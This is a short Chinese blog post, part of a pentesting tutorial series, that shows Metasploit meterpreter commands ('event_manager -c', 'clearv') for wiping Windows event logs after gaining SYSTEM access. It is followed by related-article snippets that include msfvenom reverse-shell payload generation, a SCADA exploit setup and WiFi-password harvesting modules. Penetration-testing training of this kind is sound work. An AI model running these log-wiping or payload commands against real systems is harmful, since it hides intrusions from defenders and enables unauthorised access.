渗透之——Metasploit清除渗透痕迹

原创

冰河技术 2019-01-12 13:57:56 ©著作权

©著作权归作者所有：来自51CTO博客作者冰河技术的原创作品，请联系作者获取转载授权，否则将追究法律责任

工具：Metasploit

为了实现这个目的，我们需要通过事件管理器模块清除事件日志。

这里，假设经过一系列的渗透测试已经获取了system权限的meterpreter，以下命令在meterpreter命令行下执行:

1.查看事件日志

run event_manager -i

2.删除事件日志

run event_manager -c

或者在meterpreter命令行中输入clearv命令清除目标系统的事件日志。

上一篇：渗透之——Metasploit访问控制的持久化

下一篇：SVN之——安装SVN服务

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

渗透测试靶机之-----DC4

DC-4信息收集nmap扫一下ip：┌──(root?AGsite)-[~]└─# nmap -sP 192.168.33.0/24Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 21:01 EDTNmap scan report for 192.168.33.1Host is up (0.00013s latency).M

测试靶机黑客
Web安全｜渗透测试｜网络安全

基础入门(P1-P5)p1概念名词1.1域名什么是域名？域名：是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称，用于在数据传输时对计算机的标识（有时也指地理位置）。什么是二级域名多级域名？二级域名：分两种在国际顶级域名下的二级域名国际顶级域名下二级域名，二级域名一般是指域名人选择使用的网上名称，如“yahoo.”；上网的商业组织通常使用自己的商标、商号或其

DNS 二级域名 IP
渗透测试和漏洞扫描有什么区别

渗透测试和漏洞扫描是网络安全领域中非常重要的两种技术手段，它们都可以帮助组织或企业发现和修复系统中的漏洞和弱点。然而，这两种技术手段在目的、深度、方法和时间和成本等方面存在显著的区别。首先我们来了解下渗透测试和漏洞扫描分别是什么？渗透测试（Penetration Testing）是通过模拟真实的黑客攻击来评估系统的安全性。渗透测试员会使用各种技术和工具，尝试攻击系统的漏洞，获取未授权的访问权限

漏洞扫描自动化工具
渗透之——Metasploit清除渗透痕迹

工具：Metasploit为了实现这个目的，我们需要通过事件管理器模块清除事件日志。这里，假设经过一系列的渗透测试已经获取了system权限的meterpreter，以下命令在meterpreter命令行下执行:1.查看事件日志run event...

渗透 Metasploit 命令行 javascript 目标系统
渗透之——Metasploit渗透MSSQL

攻击机 kali 192.168.109.137靶机 Win7_x64 192.168.109.139数据库 MSSQL 2008 R2MSSQL运行在TCP的1433端口以及UDP的1434端口1.使用NMAP对MSSQL进行踩点这里，我们使...

渗透 Metasploit MSSQL sql microsoft
渗透之——利用Metasploit渗透VOIP

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/865368611.对VOIP服务踩点use auxiliary/scanner/sip/optionsshow optionsset RHOSTS 192.168.109.0/24run2.扫描VOIP服务use auxiliary/scanner/sip...

Metasploit
渗透之——Metasploit渗透BSPlayer V2.68

攻击机 Kali 192.168.109.137靶机 WinXP 192.168.109.141应用程序 BSPlayer V2.68 (

渗透 Metasploit BSPlayer V2.68 服务器 javascript
渗透测试-后渗透-痕迹清理

痕迹清理

bash linux 开发语言 tomcat vim
渗透之——Metasploit渗透php-utility-belt程序

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86526103攻击机 kali 192.168.109.137靶机：Win XP 192.168.109.141应用程序 php-utility-belt (可以到链接：https://download.csdn.net/download/l1028386804/109...

渗透技术渗透测试安全技术
渗透之——使用Metasploit编写绕过DEP渗透模块

攻击机 Kali 192.168.109.137靶机 WinXP 192.168.109.141 (也可为其他Win系统，设置为DEP保护)应用程序 Vulnserver(可以到链接： https://download.csdn.net/download/...

渗透 Metasploit 上传数据命令行
渗透测试-Metasploit

Msf（the Matesploit Framework）基础框架方便强大框架全球性exp poc 脚本利于测试术语运行cd = backls = dir pwdbannercolorconnect 链接一个主机、网络edit 编辑一个模块exit 退出控制台get 获取变量getg 全局变量go_pro 进入GUI

安全 web安全 mysql 用户名 postgresql
客户端渗透之——使用Metasploit渗透Android系统

可以创建一个新的APK文件，也可以将攻击载荷注入到一个现有的APK文件来攻击Android平台，这里我们使用第一种方法。1.创建APK文件msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168....

渗透 Metasploit apache 下载安装 android
渗透测试入门21之Metasploit渗透测试常用流程

Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件

f5 linux 命令行
渗透痕迹分析随笔

freebuf01 FreeBuf 网上，关于入侵痕迹分析的文章很多，在此将个人工作中常用的一些方法技巧(班门弄斧了)，以及爬过的坑总结如下（当然，其中有些方法也是从各位前辈的经验中学习的）。入侵痕迹分析，不外乎正向推理，和逆向推理。当已经掌握部分线索时，可通过逆向推理，快速确定事发时间、影响范围、事发原因等；当没有明确的线索，可以入侵者的视角，通过正向思维进行推理，从而发现入侵行为；两种方法都

Java
Metasploit之——高级后渗透模块

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/866667671.迁移到更安全的进程migrate [要迁移到的进程id]2.获取系统级权限getsystem注：getsystem模块在比较新的Windows系统中不太稳定，最好使用本地的提升权限方法和模块来提升控制权限。meterpreter &g...

Metasploit
渗透之——Empire 反弹回 Metasploit

在实际渗透中，当拿到WebShell上传的MSF客户端无法绕过目标主机的杀毒软件时，可以使用PowerShell来绕过，也可以执行Empire的Payload来绕过，成功之后再使用Empiore的模块将其反弹回Metasploit。这里使用Empire的usem...

渗透 empire metasploit 反弹 Shell
渗透之——Metasploit命令及模块

show exploits列出metasploit框架中的所有渗透攻击模块。show payloads列出metasploit框架中的所有攻击载荷。show auxiliary列出metasploit框架中的所有辅助攻击载荷。search name查找metasploit框架中所有的渗透攻击和其他模块。info展示出制定渗透攻击或模块的相关信息。use name装载一个渗透攻...

渗透 Metasploit linux php unix
渗透之——利用Metasploit渗透DATAC RealWin SCADA Server 2.0

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86532002msfconsoleuse exploit/windows/scada/realwin_scpc_initializeset RHOST 192.168.109.141set payload windows/meterpreter/bind_tcpsho...

Metasploit
Metasploit之——其他后渗透模块

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/866692531.收集无线SSID信息run post/windows/wlan/wlan_bss_listmeterpreter > run post/windows/wlan/wlan_bss_list2.收集无线Wifi密码run post/wi...

Metasploit
Metasploit之——基本后渗透命令

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86666319核心Meterpreter命令指的是已经被Meterpreter攻击载荷成功渗透的计算机向我们提供的用于后渗透操作的基本功能。注意：Metasploit的后渗透命令都是在拿到了目标主机的Meterpreter权限之后，在Meterpreter命令行下执行的各种...

Metasploit

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯